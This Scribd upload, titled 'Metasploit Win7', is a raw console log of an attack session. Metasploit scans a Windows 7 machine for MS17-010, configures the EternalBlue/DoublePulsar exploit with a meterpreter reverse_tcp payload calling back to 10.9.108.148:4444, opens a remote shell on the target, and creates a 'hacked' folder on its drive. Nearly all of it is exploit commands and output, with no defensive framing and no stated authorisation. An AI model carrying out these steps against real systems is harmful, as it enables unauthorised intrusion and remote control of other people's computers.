Scribd
Upload
107 views3 pages

Metasploit Win7

The document details using Metasploit to scan for and exploit the EternalBlue vulnerability to gain remote code execution on a Windows 7 system. Metasploit is used to scan for MS17-010, identify a vulnerable system, set options for the eternalblue_doublepulsar exploit such as payload and target, and execute the exploit to retrieve a meterpreter session and shell access on the remote system.

Uploaded by

kirancha77
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
107 views3 pages

Metasploit Win7

The document details using Metasploit to scan for and exploit the EternalBlue vulnerability to gain remote code execution on a Windows 7 system. Metasploit is used to scan for MS17-010, identify a vulnerable system, set options for the eternalblue_doublepulsar exploit such as payload and target, and execute the exploit to retrieve a meterpreter session and shell access on the remote system.

Uploaded by

kirancha77
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 3

Metasploit command and Hacked computer

root@kali:~# msfconsole
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.9.108.150
rhost => 10.9.108.150
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.9.108.150:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601


Service Pack 1 x64 (64-bit)
[*] 10.9.108.150:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > use
exploit/windows/smb/externalblue_doublepulsar
[-] No results from search
[-] Failed to load module: exploit/windows/smb/externalblue_doublepulsar
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/externalblue-doublepulsar
[-] No results from search
[-] Failed to load module: exploit/windows/smb/externalblue-doublepulsar
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/eternalblue-doublepulsar
[-] No results from search
[-] Failed to load module: exploit/windows/smb/eternalblue-doublepulsar
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/eternalblue_doublepulsar
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set payload
windows/x64/meterperter/reverse_tcp
[-] The value specified for payload is not valid.
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set payload
windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set processinject explorer.exe
processinject => explorer.exe
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set targetarchitecture x64
targetarchitecture => x64
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set rhost 10.9.108.150
rhost => 10.9.108.150
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set lhost 10.9.108.148
lhost => 10.9.108.148
msf5 exploit(windows/smb/eternalblue_doublepulsar) > set lport 4444
lport => 4444
msf5 exploit(windows/smb/eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 10.9.108.148:4444


[*] 10.9.108.150:445 - Generating Eternalblue XML data
[*] 10.9.108.150:445 - Generating Doublepulsar XML data
[*] 10.9.108.150:445 - Generating payload DLL for Doublepulsar
[*] 10.9.108.150:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 10.9.108.150:445 - Launching Eternalblue...
[+] 10.9.108.150:445 - Pwned! Eternalblue success!
[*] 10.9.108.150:445 - Launching Doublepulsar...
[*] Sending stage (206403 bytes) to 10.9.108.150
[*] Meterpreter session 1 opened (10.9.108.148:4444 -> 10.9.108.150:49158) at 2019-11-27
14:03:44 -0500
[+] 10.9.108.150:445 - Remote code executed... 3... 2... 1...

meterpreter >
meterpreter > sysinfo
Computer : WIN-4FNJFAGB7R3
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > shell
Process 2868 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd\
cd\

C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is AEAA-2E88

Directory of C:\

07/13/2009 10:20 PM <DIR> PerfLogs


11/12/2019 07:36 PM <DIR> Program Files
07/13/2009 11:57 PM <DIR> Program Files (x86)
11/12/2019 07:35 PM <DIR> Users
11/12/2019 07:35 PM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 52,804,333,568 bytes free
C:\>md hacked
md hacked

C:\>cd hacked
cd hacked

C:\hacked>

You might also like